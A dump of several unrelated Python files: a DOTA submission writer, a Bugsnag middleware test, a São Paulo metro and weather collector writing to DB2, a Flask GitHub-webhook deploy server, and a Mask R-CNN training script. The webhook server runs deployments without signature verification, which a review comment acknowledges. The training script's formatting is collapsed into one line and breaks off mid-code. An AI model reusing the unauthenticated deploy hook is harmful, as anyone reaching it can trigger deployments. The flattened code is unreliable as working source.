    for fname, (bboxes, scores, labels) in ret:
        for bbox, score, label in zip(bboxes, scores, labels):
            bbox = xywha2xy4(bbox).ravel()
            line = '%s %.12f %.1f %.1f %.1f %.1f %.1f %.1f %.1f %.1f' % (fname, score, *bbox)
            ret_save[NAMES[label]].append(line)
    print('saving...')
    os.makedirs('submission', exist_ok=True)
    for name, dets in ret_save.items():
        with open(os.path.join('submission', 'Task%d_%s.txt' % (1, name)), 'wt') as f:
            f.write('\n'.join(dets))
    print('creating submission...')
    if os.path.exists('Task1.zip'):
        os.remove('Task1.zip')
    os.system('zip -j Task1.zip {}'.format('submission/*'))
    shutil.rmtree('submission')
    print('finished')
test_sessionmiddleware.py
import unittest
import threading
from bugsnag.sessiontracker import SessionTracker, SessionMiddleware
from bugsnag.configuration import Configuration
from bugsnag.event import Event


class TestSessionMiddleware(unittest.TestCase):
    def setUp(self):
        self.config = Configuration()
        self.config.configure(api_key='fff', auto_capture_sessions=False)
        self.sessiontracker = SessionTracker(self.config)
        # Mark sessions as auto-captured without standing up a delivery queue.
        self.sessiontracker.auto_sessions = True

    def tearDown(self):
        pass

    def test_increment_counts(self):
        """Each handled event bumps the session's handled count, and an event
        processed earlier keeps the counts it was stamped with."""
        middleware = SessionMiddleware(lambda event: None)
        self.sessiontracker.start_session()

        first = Event(Exception('shucks'), self.config, None)
        middleware(first)
        assert first.session['events']['unhandled'] == 0
        assert first.session['events']['handled'] == 1

        second = Event(Exception('oh no'), self.config, None)
        middleware(second)
        assert second.session['events']['unhandled'] == 0
        assert second.session['events']['handled'] == 2

        # The earlier event's snapshot must be unaffected by later events.
        assert first.session['events']['unhandled'] == 0
        assert first.session['events']['handled'] == 1

    def test_it_does_nothing_if_no_session_exists(self):
        """On a thread that never started a session, the middleware must leave
        event.session unset and raise nothing."""
        def exercise_middleware():
            try:
                worker.exc_info = None
                middleware = SessionMiddleware(lambda event: None)
                event = Event(Exception('shucks'), self.config, None)
                middleware(event)
                assert event.session is None
            except Exception:
                import sys
                # Stash the failure so the main thread can report it.
                worker.exc_info = sys.exc_info()

        worker = threading.Thread(target=exercise_middleware)
        worker.start()
        worker.join()
        # Any assertion/exception inside the worker thread surfaces here.
        self.assertEqual(None, worker.exc_info, worker.exc_info)
main.py
"""Collect São Paulo metro line statuses and current weather, then persist
both into DB2 tables via JDBC (jaydebeapi/jpype)."""
import datetime
import queue
import threading
import jaydebeapi
import jpype
import requests
import json

# Credentials/endpoints are placeholders, filled in at deploy time.
token_ct = '###############################'
dsn = '############################'
uid = '########'
pwd = '########'
tbl_m = 'METRO_STATUS'
tbl_w = 'WEATHER'

jar = 'db2jcc4.jar'  # location of the jdbc driver jar
args = '-Djava.class.path=%s' % jar
jvm = jpype.getDefaultJVMPath()
jpype.startJVM(jvm, args)


def exec_query(query):
    """Execute one statement or a list of statements against the DB2 database.

    Each item may be a plain SQL string (legacy form) or a ``(sql, params)``
    pair for a parameterized execute. Connection and cursor are always
    released, even when a statement raises. Returns ``(200, 'Success')``.
    """
    conn = jaydebeapi.connect(
        'com.ibm.db2.jcc.DB2Driver',
        dsn,
        [uid, pwd]
    )
    try:
        curs = conn.cursor()
        try:
            stmts = query if isinstance(query, list) else [query]
            for stmt in stmts:
                if isinstance(stmt, tuple):
                    sql, params = stmt
                    curs.execute(sql, params)
                else:
                    curs.execute(stmt)
        finally:
            curs.close()
    finally:
        # try/finally so a failed INSERT cannot leak the JDBC connection.
        conn.close()
    return 200, 'Success'


def build_query(content):
    """Build parameterized INSERTs for the metro rows and the weather row.

    Parameter binding (DB-API ``?`` placeholders) replaces the previous string
    concatenation, which broke on quotes in the data and was injectable.
    Returns a list of ``(sql, params)`` pairs: one per metro record, then the
    weather insert — all stamped with the same capture timestamp.
    """
    datenow = str(datetime.datetime.now())
    wc = content['weather_content']['data']

    querys = []
    metro_sql = 'INSERT INTO ' + tbl_m + ' VALUES (?, ?, ?, ?)'
    for record in content['metro_content']:
        querys.append((metro_sql,
                       [record['Codigo'], record['StatusOperacao'],
                        record['Descricao'], datenow]))

    weather_sql = 'INSERT INTO ' + tbl_w + ' VALUES (?, ?, ?, ?, ?, ?, ?, ?)'
    querys.append((weather_sql,
                   [wc['temperature'], wc['sensation'], wc['wind_direction'],
                    wc['wind_velocity'], wc['humidity'], wc['condition'],
                    wc['pressure'], datenow]))
    return querys


def save_content(content):
    """Persist the fetched metro + weather content; returns (status, message)."""
    querys = build_query(content)
    return exec_query(querys)


def get_metro_content(out_queue):
    """Fetch metro line statuses; puts a list on `out_queue` ([] on any failure).

    The except branch guarantees something is always enqueued — previously a
    network error killed the thread before ``put`` and the caller's
    ``queue.get()`` blocked forever.
    """
    try:
        req = requests.get(
            'https://www.viamobilidade.com.br/_vti_bin/SituacaoService.svc/GetAllSituacao',
            timeout=30)
        json_response = req.json() if req.status_code == 200 else []
    except (requests.RequestException, ValueError):
        json_response = []
    out_queue.put(json_response)
    return json_response


def get_weather_content(out_queue):
    """Fetch current weather; puts a dict on `out_queue` ({} on any failure)."""
    try:
        req = requests.get(
            'http://apiadvisor.climatempo.com.br/api/v1/weather/locale/3477/current?token='
            + token_ct,
            timeout=30)
        json_response = req.json() if req.status_code == 200 else {}
    except (requests.RequestException, ValueError):
        json_response = {}
    out_queue.put(json_response)
    return json_response


def get_content_multhreading():
    """Fetch metro and weather content concurrently.

    Returns (metro_content, metro_status, weather_content, weather_status)
    where a status of 500 marks an empty/failed fetch.
    """
    my_queue = queue.Queue()
    t1 = threading.Thread(target=get_metro_content, args=(my_queue,))
    t2 = threading.Thread(target=get_weather_content, args=(my_queue,))
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    # Queue order is nondeterministic: metro content is a list, weather a
    # dict, so swap if the item first pulled is actually the weather payload.
    content_w = my_queue.get()
    content_m = my_queue.get()
    if isinstance(content_m, dict):
        content_m, content_w = content_w, content_m
    m_status = 200 if len(content_m) > 0 else 500
    w_status = 200 if len(content_w) > 0 else 500
    return content_m, m_status, content_w, w_status


def get_content():
    """Combine both fetches; returns (content, status, error_message)."""
    content_m, m_status, content_w, w_status = get_content_multhreading()
    if m_status == 200 and w_status == 200:
        content = {'metro_content': content_m, 'weather_content': content_w}
        return content, 200, ''
    msg = 'Could not retrieve'
    if m_status != 200:
        msg = msg + ', Metro'
    if w_status != 200:
        msg = msg + ', Weather'
    msg = msg + ' content.'
    return {}, 500, msg


def main():
    """Fetch content and persist it; returns the final HTTP-style status."""
    content, status, msg = get_content()
    if status == 200:
        status, msg = save_content(content)
    if status != 200:
        pass  # TODO: send_warning_email(status, msg)
    return status


if __name__ == "__main__":
    main()
webserver.py
from threading import Thread
import subprocess
from slackclient import SlackClient
from flask import Flask
from flask import request
from flask import jsonify

app = Flask(__name__)

slack_token = "<slack token>"
sc = SlackClient(slack_token)


def deploy(x):
    """Run the deployment script, then announce completion on Slack.

    x: the webhook payload; unused, but kept so existing
    Thread(target=deploy, args=(data,)) callers keep working.
    """
    print("running deployment...")
    # NOTE(review): path has no leading '/', so it resolves relative to the
    # server's working directory — confirm '/home/project/...' was not intended.
    subprocess.call(["/bin/bash", "home/project/deploy/deploy.sh"])
    sc.api_call("chat.postMessage",
                channel="<channel>",
                # Fix: user-facing typo "deployent" -> "deployment".
                text="The deployment has been completed!")


@app.route('/webhooks/lpa', methods=["POST"])
def listen_webhook():
    """GitHub webhook handler: deploy when a PR into master is closed as merged.

    Fix: non-pull-request events (or malformed/missing JSON) used to raise
    KeyError and return HTTP 500; they now fall through to the
    "No deployment made." response.
    NOTE(review): the webhook signature (X-Hub-Signature) is not verified —
    anyone who can reach this endpoint can trigger a deployment.
    """
    data = request.get_json(silent=True) or {}
    pull_request = data.get("pull_request") or {}
    branch = (pull_request.get("base") or {}).get("ref")
    action = data.get("action")
    merged = pull_request.get("merged")
    if branch and "master" in branch and action == "closed" and merged:
        #Spawn thread to process the data
        sc.api_call("chat.postMessage",
                    channel="<channel>",
                    text="A deployment to https://applications.linkedpipes.com has started...")
        t = Thread(target=deploy, args=(data,))
        t.start()
        return jsonify({"message": "deployment will be made"}), 200
    return jsonify({"message": "No deployment made."}), 200


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8085)
train_mask_rcnn.py
"""Train Mask RCNN end to end.""" import argparse import os # disable autotune os.environ['MXNET_CUDNN_AUTOTUNE_DEFAULT'] = '0' os.environ['MXNET_GPU_MEM_POOL_TYPE'] = 'Round' os.environ['MXNET_GPU_MEM_POOL_ROUND_LINEAR_CUTOFF'] = '28' os.environ['MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD'] = '999' os.environ['MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_BWD'] = '25' os.environ['MXNET_GPU_COPY_NTHREADS'] = '1' os.environ['MXNET_OPTIMIZER_AGGREGATION_SIZE'] = '54' os.environ['MXNET_USE_FUSION'] = '0' import logging import time import numpy as np import mxnet as mx from mxnet import gluon from mxnet.contrib import amp from distutils.version import LooseVersion import gluoncv as gcv _PRE_GCV_0_9_0 = LooseVersion(gcv.__version__) < LooseVersion('0.9.0') gcv.utils.check_version('0.7.0') from gluoncv import data as gdata from gluoncv import utils as gutils from gluoncv.model_zoo import get_model from gluoncv.data import batchify from gluoncv.data.transforms.presets.rcnn import MaskRCNNDefaultTrainTransform, \ MaskRCNNDefaultValTransform from gluoncv.utils.metrics.coco_instance import COCOInstanceMetric from gluoncv.utils.metrics.rcnn import RPNAccMetric, RPNL1LossMetric, RCNNAccMetric, \ RCNNL1LossMetric, MaskAccMetric, MaskFGAccMetric from gluoncv.utils.parallel import Parallel from gluoncv.data import COCODetection, VOCDetection from multiprocessing import Process from gluoncv.model_zoo.rcnn.mask_rcnn.data_parallel import ForwardBackwardTask try: import horovod.mxnet as hvd except ImportError: hvd = None try: from mpi4py import MPI except ImportError: logging.info('mpi4py is not installed. 
Use "pip install --no-cache mpi4py" to install') MPI = None # from mxnet import profiler def parse_args(): parser = argparse.ArgumentParser(description='Train Mask R-CNN network end to end.') parser.add_argument('--network', type=str, default='resnet50_v1b', help="Base network name which serves as feature extraction base.") parser.add_argument('--dataset', type=str, default='coco', help='Training dataset. Now support coco.') parser.add_argument('--num-workers', '-j', dest='num_workers', type=int, default=4, help='Number of data workers, you can use larger ' 'number to accelerate data loading, if you CPU and GPUs ' 'are powerful.') parser.add_argument('--batch-size', type=int, default=8, help='Training mini-batch size.') parser.add_argument('--gpus', type=str, default='0', help='Training with GPUs, you can specify 1,3 for example.') parser.add_argument('--epochs', type=str, default='', help='Training epochs.') parser.add_argument('--resume', type=str, default='', help='Resume from previously saved parameters if not None. ' 'For example, you can resume from ./mask_rcnn_xxx_0123.params') parser.add_argument('--start-epoch', type=int, default=0, help='Starting epoch for resuming, default is 0 for new training.' 'You can specify it to 100 for example to start from 100 epoch.') parser.add_argument('--lr', type=str, default='', help='Learning rate, default is 0.01 for coco 8 gpus training.') parser.add_argument('--lr-decay', type=float, default=0.1, help='decay rate of learning rate. default is 0.1.') parser.add_argument('--lr-decay-epoch', type=str, default='', help='epochs at which learning rate decays. default is 17,23 for coco.') parser.add_argument('--lr-warmup', type=str, default='', help='warmup iterations to adjust learning rate, default is 1000 for coco.') parser.add_argument('--lr-warmup-factor', type=float, default=1. 
/ 3., help='warmup factor of base lr.') parser.add_argument('--clip-gradient', type=float, default=-1., help='gradient clipping.') parser.add_argument('--momentum', type=float, default=0.9, help='SGD momentum, default is 0.9') parser.add_argument('--wd', type=str, default='', help='Weight decay, default is 1e-4 for coco') parser.add_argument('--log-interval', type=int, default=100, help='Logging mini-batch interval. Default is 100.') parser.add_argument('--save-prefix', type=str, default='', help='Saving parameter prefix') parser.add_argument('--save-interval', type=int, default=1, help='Saving parameters epoch interval, best model will always be saved.') parser.add_argument('--val-interval', type=int, default=1, help='Epoch interval for validation, increase the number will reduce the ' 'training time if validation is slow.') parser.add_argument('--seed', type=int, default=233, help='Random seed to be fixed.') parser.add_argument('--verbose', dest='verbose', action='store_true', help='Print helpful debugging info once set.') # Norm layer options parser.add_argument('--norm-layer', type=str, default=None, help='Type of normalization layer to use. ' 'If set to None, backbone normalization layer will be fixed,' ' and no normalization layer will be used. ' 'Currently supports \'bn\', and None, default is None') # Loss options parser.add_argument('--rpn-smoothl1-rho', type=float, default=1. / 9., help='RPN box regression transition point from L1 to L2 loss.' 'Set to 0.0 to make the loss simply L1.') parser.add_argument('--rcnn-smoothl1-rho', type=float, default=1., help='RCNN box regression transition point from L1 to L2 loss.' 'Set to 0.0 to make the loss simply L1.') # FPN options parser.add_argument('--use-fpn', action='store_true', help='Whether to use feature pyramid network.') # Performance options parser.add_argument('--disable-hybridization', action='store_true', help='Whether to disable hybridize the entire model. 
' 'Memory usage and speed will decrese.') parser.add_argument('--static-alloc', action='store_true', help='Whether to use static memory allocation. Memory usage will increase.') parser.add_argument('--amp', action='store_true', help='Use MXNet AMP for mixed precision training.') parser.add_argument('--horovod', action='store_true', help='Use MXNet Horovod for distributed training. Must be run with OpenMPI. ' '--gpus is ignored when using --horovod.') parser.add_argument('--use-ext', action='store_true', help='Use NVIDIA MSCOCO API. Make sure you install first') parser.add_argument('--executor-threads', type=int, default=1, help='Number of threads for executor for scheduling ops. ' 'More threads may incur higher GPU memory footprint, ' 'but may speed up throughput. Note that when horovod is used, ' 'it is set to 1.') parser.add_argument('--kv-store', type=str, default='nccl', help='KV store options. local, device, nccl, dist_sync, dist_device_sync, ' 'dist_async are available.') # Advanced options. Expert Only!! Currently non-FPN model is not supported!! # Default setting is for MS-COCO. # The following options are only used if custom-model is enabled subparsers = parser.add_subparsers(dest='custom_model') custom_model_parser = subparsers.add_parser( 'custom-model', help='Use custom Faster R-CNN w/ FPN model. This is for expert only!' ' You can modify model internal parameters here. 
Once enabled, ' 'custom model options become available.') custom_model_parser.add_argument( '--no-pretrained-base', action='store_true', help='Disable pretrained base network.') custom_model_parser.add_argument( '--num-fpn-filters', type=int, default=256, help='Number of filters in FPN output layers.') custom_model_parser.add_argument( '--num-box-head-conv', type=int, default=4, help='Number of convolution layers to use in box head if ' 'batch normalization is not frozen.') custom_model_parser.add_argument( '--num-box-head-conv-filters', type=int, default=256, help='Number of filters for convolution layers in box head.' ' Only applicable if batch normalization is not frozen.') custom_model_parser.add_argument( '--num_box_head_dense_filters', type=int, default=1024, help='Number of hidden units for the last fully connected layer in ' 'box head.') custom_model_parser.add_argument( '--image-short', type=str, default='800', help='Short side of the image. Pass a tuple to enable random scale augmentation.') custom_model_parser.add_argument( '--image-max-size', type=int, default=1333, help='Max size of the longer side of the image.') custom_model_parser.add_argument( '--nms-thresh', type=float, default=0.5, help='Non-maximum suppression threshold for R-CNN. ' 'You can specify < 0 or > 1 to disable NMS.') custom_model_parser.add_argument( '--nms-topk', type=int, default=-1, help='Apply NMS to top k detection results in R-CNN. ' 'Set to -1 to disable so that every Detection result is used in NMS.') custom_model_parser.add_argument( '--post-nms', type=int, default=-1, help='Only return top `post_nms` detection results, the rest is discarded.' ' Set to -1 to return all detections.') custom_model_parser.add_argument( '--roi-mode', type=str, default='align', choices=['align', 'pool'], help='ROI pooling mode. Currently support \'pool\' and \'align\'.') custom_model_parser.add_argument( '--roi-size', type=str, default='14,14', help='The output spatial size of ROI layer. eg. 
ROIAlign, ROIPooling') custom_model_parser.add_argument( '--strides', type=str, default='4,8,16,32,64', help='Feature map stride with respect to original image. ' 'This is usually the ratio between original image size and ' 'feature map size. Since the custom model uses FPN, it is a list of ints') custom_model_parser.add_argument( '--clip', type=float, default=4.14, help='Clip bounding box transformation predictions ' 'to prevent exponentiation from overflowing') custom_model_parser.add_argument( '--rpn-channel', type=int, default=256, help='Number of channels used in RPN convolution layers.') custom_model_parser.add_argument( '--anchor-base-size', type=int, default=16, help='The width(and height) of reference anchor box.') custom_model_parser.add_argument( '--anchor-aspect-ratio', type=str, default='0.5,1,2', help='The aspect ratios of anchor boxes.') custom_model_parser.add_argument( '--anchor-scales', type=str, default='2,4,8,16,32', help='The scales of anchor boxes with respect to base size. ' 'We use the following form to compute the shapes of anchors: ' 'anchor_width = base_size * scale * sqrt(1 / ratio)' 'anchor_height = base_size * scale * sqrt(ratio)') custom_model_parser.add_argument( '--anchor-alloc-size', type=str, default='384,384', help='Allocate size for the anchor boxes as (H, W). ' 'We generate enough anchors for large feature map, e.g. 384x384. ' 'During inference we can have variable input sizes, ' 'at which time we can crop corresponding anchors from this large ' 'anchor map so we can skip re-generating anchors for each input. ') custom_model_parser.add_argument( '--rpn-nms-thresh', type=float, default='0.7', help='Non-maximum suppression threshold for RPN.') custom_model_parser.add_argument( '--rpn-train-pre-nms', type=int, default=12000, help='Filter top proposals before NMS in RPN training.') custom_model_parser.add_argument( '--rpn-train-post-nms', type=int, default=2000, help='Return top proposal results after NMS in RPN training. 
' 'Will be set to rpn_train_pre_nms if it is larger than ' 'rpn_train_pre_nms.') custom_model_parser.add_argument( '--rpn-test-pre-nms', type=int, default=6000, help='Filter top proposals before NMS in RPN testing.') custom_model_parser.add_argument( '--rpn-test-post-nms', type=int, default=1000, help='Return top proposal results after NMS in RPN testing. ' 'Will be set to rpn_test_pre_nms if it is larger than rpn_test_pre_nms.') custom_model_parser.add_argument( '--rpn-min-size', type=int, default=1, help='Proposals whose size is smaller than ``min_size`` will be discarded.') custom_model_parser.add_argument( '--rcnn-num-samples', type=int, default=512, help='Number of samples for RCNN training.') custom_model_parser.add_argument( '--rcnn-pos-iou-thresh', type=float, default=0.5, help='Proposal whose IOU larger than ``pos_iou_thresh`` is ' 'regarded as positive samples for R-CNN.') custom_model_parser.add_argument( '--rcnn-pos-ratio', type=float, default=0.25, help='``pos_ratio`` defines how many positive samples ' '(``pos_ratio * num_sample``) is to be sampled for R-CNN.') custom_model_parser.add_argument( '--max-num-gt', type=int, default=100, help='Maximum ground-truth number for each example. This is only an upper bound, not' 'necessarily very precise. However, using a very big number may impact the ' 'training speed.') custom_model_parser.add_argument( '--target-roi-scale', type=int, default=2, help='Ratio of mask output roi / input roi. ' 'For model with FPN, this is typically 2.') custom_model_parser.add_argument( '--num-mask-head-convs', type=int, default=4, help='Number of convolution blocks before deconv layer for mask head. 
' 'For FPN network this is typically 4.') args = parser.parse_args() if args.horovod: if hvd is None: raise SystemExit("Horovod not found, please check if you installed it correctly.") hvd.init() args.epochs = int(args.epochs) if args.epochs else 26 args.lr_decay_epoch = args.lr_decay_epoch if args.lr_decay_epoch else '17,23' args.lr = float(args.lr) if args.lr else (0.00125 * args.batch_size) args.lr_warmup = args.lr_warmup if args.lr_warmup else max((8000 / args.batch_size), 1000) args.wd = float(args.wd) if args.wd else 1e-4 def str_args2num_args(arguments, args_name, num_type): try: ret = [num_type(x) for x in arguments.split(',')] if len(ret) == 1: return ret[0] return ret except ValueError: raise ValueError('invalid value for', args_name, arguments) if args.custom_model: args.image_short = str_args2num_args(args.image_short, '--image-short', int) args.roi_size = str_args2num_args(args.roi_size, '--roi-size', int) args.strides = str_args2num_args(args.strides, '--strides', int) args.anchor_aspect_ratio = str_args2num_args(args.anchor_aspect_ratio, '--anchor-aspect-ratio', float) args.anchor_scales = str_args2num_args(args.anchor_scales, '--anchor-scales', float) args.anchor_alloc_size = str_args2num_args(args.anchor_alloc_size, '--anchor-alloc-size', int) if args.amp and args.norm_layer == 'bn': raise NotImplementedError('SyncBatchNorm currently does not support AMP.') return args def get_dataset(dataset, args): if dataset.lower() == 'coco': train_dataset = gdata.COCOInstance(splits='instances_train2017') val_dataset = gdata.COCOInstance(splits='instances_val2017', skip_empty=False) starting_id = 0 if args.horovod and MPI: length = len(val_dataset) shard_len = length // hvd.size() rest = length % hvd.size() # Compute the start index for this partition starting_id = shard_len * hvd.rank() + min(hvd.rank(), rest) val_metric = COCOInstanceMetric(val_dataset, args.save_prefix + '_eval', use_ext=args.use_ext, starting_id=starting_id) else: raise 
NotImplementedError('Dataset: {} not implemented.'.format(dataset)) if args.horovod and MPI: val_dataset = val_dataset.shard(hvd.size(), hvd.rank()) return train_dataset, val_dataset, val_metric def get_dataloader(net, train_dataset, val_dataset, train_transform, val_transform, batch_size, num_shards_per_process, args): """Get dataloader.""" train_bfn = batchify.MaskRCNNTrainBatchify(net, num_shards_per_process) if _PRE_GCV_0_9_0: sampler = gcv.nn.sampler else: sampler = gcv.data.sampler train_sampler = \ sampler.SplitSortedBucketSampler(train_dataset.get_im_aspect_ratio(), batch_size, num_parts=hvd.size() if args.horovod else 1, part_index=hvd.rank() if args.horovod else 0, shuffle=True) train_loader = mx.gluon.data.DataLoader(train_dataset.transform( train_transform(net.short, net.max_size, net, ashape=net.ashape, multi_stage=args.use_fpn)), batch_sampler=train_sampler, batchify_fn=train_bfn, num_workers=args.num_workers) val_bfn = batchify.Tuple(*[batchify.Append() for _ in range(2)]) short = net.short[-1] if isinstance(net.short, (tuple, list)) else net.short # validation use 1 sample per device val_loader = mx.gluon.data.DataLoader( val_dataset.transform(val_transform(short, net.max_size)), num_shards_per_process, False, batchify_fn=val_bfn, last_batch='keep', num_workers=args.num_workers) return train_loader, val_loader def save_params(net, logger, best_map, current_map, epoch, save_interval, prefix): current_map = float(current_map) if current_map > best_map[0]: logger.info('[Epoch {}] mAP {} higher than current best {} saving to {}'.format( epoch, current_map, best_map, '{:s}_best.params'.format(prefix))) best_map[0] = current_map net.save_parameters('{:s}_best.params'.format(prefix)) with open(prefix + '_best_map.log', 'a') as f: f.write('\n{:04d}:\t{:.4f}'.format(epoch, current_map)) if save_interval and (epoch + 1) % save_interval == 0: logger.info('[Epoch {}] Saving parameters to {}'.format( epoch, '{:s}_{:04d}_{:.4f}.params'.format(prefix, epoch, 
current_map))) net.save_parameters('{:s}_{:04d}_{:.4f}.params'.format(prefix, epoch, current_map)) def _stage_data(i, data, ctx_list, pinned_data_stage): def _get_chunk(data, storage): s = storage.reshape(shape=(storage.size,)) s = s[:data.size] s = s.reshape(shape=data.shape) data.copyto(s) return s if ctx_list[0].device_type == "cpu": return data if i not in pinned_data_stage: pinned_data_stage[i] = [d.as_in_context(mx.cpu_pinned()) for d in data] return pinned_data_stage[i] storage = pinned_data_stage[i] for j in range(len(storage)): if data[j].size > storage[j].size: storage[j] = data[j].as_in_context(mx.cpu_pinned()) return [_get_chunk(d, s) for d, s in zip(data, storage)] pinned_data_stage = {} def split_and_load(batch, ctx_list): """Split data to 1 batch each device.""" new_batch = [] for i, data in enumerate(batch): if isinstance(data, (list, tuple)): new_data = [x.as_in_context(ctx) for x, ctx in zip(data, ctx_list)] else: new_data = [data.as_in_context(ctx_list[0])] new_batch.append(new_data) return new_batch def validate(net, val_data, async_eval_processes, ctx, eval_metric, logger, epoch, best_map, args): """Test on validation dataset.""" clipper = gcv.nn.bbox.BBoxClipToImage() eval_metric.reset() if not args.disable_hybridization: net.hybridize(static_alloc=args.static_alloc) tic = time.time() for ib, batch in enumerate(val_data): batch = split_and_load(batch, ctx_list=ctx) det_bboxes = [] det_ids = [] det_scores = [] det_masks = [] det_infos = [] for x, im_info in zip(*batch): # get prediction results ids, scores, bboxes, masks = net(x) det_bboxes.append(clipper(bboxes, x)) det_ids.append(ids) det_scores.append(scores) det_masks.append(masks) det_infos.append(im_info) # update metric for det_bbox, det_id, det_score, det_mask, det_info in zip(det_bboxes, det_ids, det_scores, det_masks, det_infos): for i in range(det_info.shape[0]): # numpy everything det_bbox = det_bbox[i].asnumpy() det_id = det_id[i].asnumpy() det_score = det_score[i].asnumpy() 
det_mask = det_mask[i].asnumpy() det_info = det_info[i].asnumpy() # filter by conf threshold im_height, im_width, im_scale = det_info valid = np.where(((det_id >= 0) & (det_score >= 0.001)))[0] det_id = det_id[valid] det_score = det_score[valid] det_bbox = det_bbox[valid] / im_scale det_mask = det_mask[valid] # fill full mask im_height, im_width = int(round(im_height / im_scale)), int( round(im_width / im_scale)) full_masks = gdata.transforms.mask.fill(det_mask, det_bbox, (im_width, im_height)) eval_metric.update(det_bbox, det_id, det_score, full_masks) if args.horovod and MPI is not None: comm = MPI.COMM_WORLD res = comm.gather(eval_metric.get_result_buffer(), root=0) if hvd.rank() == 0: logger.info('[Epoch {}] Validation Inference cost: {:.3f}' .format(epoch, (time.time() - tic))) rank0_res = eval_metric.get_result_buffer() if len(rank0_res) == 2: res = res[1:] rank0_res[0].extend([item for res_tuple in res for item in res_tuple[0]]) rank0_res[1].extend([item for res_tuple in res for item in res_tuple[1]]) else: rank0_res.extend([item for r in res for item in r]) def coco_eval_save_task(eval_metric, logger): map_name, mean_ap = eval_metric.get() if map_name and mean_ap is not None: val_msg = '\n'.join(['{}={}'.format(k, v) for k, v in zip(map_name, mean_ap)]) logger.info('[Epoch {}] Validation: \n{}'.format(epoch, val_msg)) current_map = float(mean_ap[-1]) save_params(net, logger, best_map, current_map, epoch, args.save_interval, args.save_prefix) if not args.horovod or hvd.rank() == 0: p = Process(target=coco_eval_save_task, args=(eval_metric, logger)) async_eval_processes.append(p) p.start() def get_lr_at_iter(alpha, lr_warmup_factor=1. 
/ 3.): return lr_warmup_factor * (1 - alpha) + alpha def train(net, train_data, val_data, eval_metric, batch_size, ctx, logger, args): """Training pipeline""" args.kv_store = 'device' if (args.amp and 'nccl' in args.kv_store) else args.kv_store kv = mx.kvstore.create(args.kv_store) net.collect_params().setattr('grad_req', 'null') net.collect_train_params().setattr('grad_req', 'write') for k, v in net.collect_params('.*bias').items(): v.wd_mult = 0.0 optimizer_params = {'learning_rate': args.lr, 'wd': args.wd, 'momentum': args.momentum, } if args.clip_gradient > 0.0: optimizer_params['clip_gradient'] = args.clip_gradient if args.amp: optimizer_params['multi_precision'] = True if args.horovod: hvd.broadcast_parameters(net.collect_params(), root_rank=0) trainer = hvd.DistributedTrainer( net.collect_train_params(), # fix batchnorm, fix first stage, etc... 'sgd', optimizer_params ) else: trainer = gluon.Trainer( net.collect_train_params(), # fix batchnorm, fix first stage, etc... 'sgd', optimizer_params, update_on_kvstore=(False if args.amp else None), kvstore=kv) if args.amp: amp.init_trainer(trainer) # lr decay policy lr_decay = float(args.lr_decay) lr_steps = sorted([float(ls) for ls in args.lr_decay_epoch.split(',') if ls.strip()]) lr_warmup = float(args.lr_warmup) # avoid int division rpn_cls_loss = mx.gluon.loss.SigmoidBinaryCrossEntropyLoss(from_sigmoid=False) rpn_box_loss = mx.gluon.loss.HuberLoss(rho=args.rpn_smoothl1_rho) # == smoothl1 rcnn_cls_loss = mx.gluon.loss.SoftmaxCrossEntropyLoss() rcnn_box_loss = mx.gluon.loss.HuberLoss(rho=args.rcnn_smoothl1_rho) # == smoothl1 rcnn_mask_loss = mx.gluon.loss.SigmoidBinaryCrossEntropyLoss(from_sigmoid=False) metrics = [mx.metric.Loss('RPN_Conf'), mx.metric.Loss('RPN_SmoothL1'), mx.metric.Loss('RCNN_CrossEntropy'), mx.metric.Loss('RCNN_SmoothL1'), mx.metric.Loss('RCNN_Mask')] rpn_acc_metric = RPNAccMetric() rpn_bbox_metric = RPNL1LossMetric() rcnn_acc_metric = RCNNAccMetric() rcnn_bbox_metric = RCNNL1LossMetric() 
rcnn_mask_metric = MaskAccMetric() rcnn_fgmask_metric = MaskFGAccMetric() metrics2 = [rpn_acc_metric, rpn_bbox_metric, rcnn_acc_metric, rcnn_bbox_metric, rcnn_mask_metric, rcnn_fgmask_metric] async_eval_processes = [] logger.info(args) if args.verbose: logger.info('Trainable parameters:') logger.info(net.collect_train_params().keys()) logger.info('Start training from [Epoch {}]'.format(args.start_epoch)) best_map = [0] base_lr = trainer.learning_rate for epoch in range(args.start_epoch, args.epochs): rcnn_task = ForwardBackwardTask(net, trainer, rpn_cls_loss, rpn_box_loss, rcnn_cls_loss, rcnn_box_loss, rcnn_mask_loss, args.amp) executor = Parallel(args.executor_threads, rcnn_task) if not args.horovod else None if not args.disable_hybridization: net.hybridize(static_alloc=args.static_alloc) while lr_steps and epoch >= lr_steps[0]: new_lr = trainer.learning_rate * lr_decay lr_steps.pop(0) trainer.set_learning_rate(new_lr) logger.info("[Epoch {}] Set learning rate to {}".format(epoch, new_lr)) for metric in metrics: metric.reset() tic = time.time() btic = time.time() speed = [] train_data_iter = iter(train_data) next_data_batch = next(train_data_iter) next_data_batch = split_and_load(next_data_batch, ctx_list=ctx) for i in range(len(train_data)): batch = next_data_batch if i + epoch * len(train_data) <= lr_warmup: # adjust based on real percentage new_lr = base_lr * get_lr_at_iter((i + epoch * len(train_data)) / lr_warmup, args.lr_warmup_factor) if new_lr != trainer.learning_rate: if i % args.log_interval == 0: logger.info('[Epoch {} Iteration {}] Set learning rate to {}' .format(epoch, i, new_lr)) trainer.set_learning_rate(new_lr) metric_losses = [[] for _ in metrics] add_losses = [[] for _ in metrics2] if executor is not None: for data in zip(*batch): executor.put(data) for j in range(len(ctx)): if executor is not None: result = executor.get() else: result = rcnn_task.forward_backward(list(zip(*batch))[0]) if (not args.horovod) or hvd.rank() == 0: for k in 
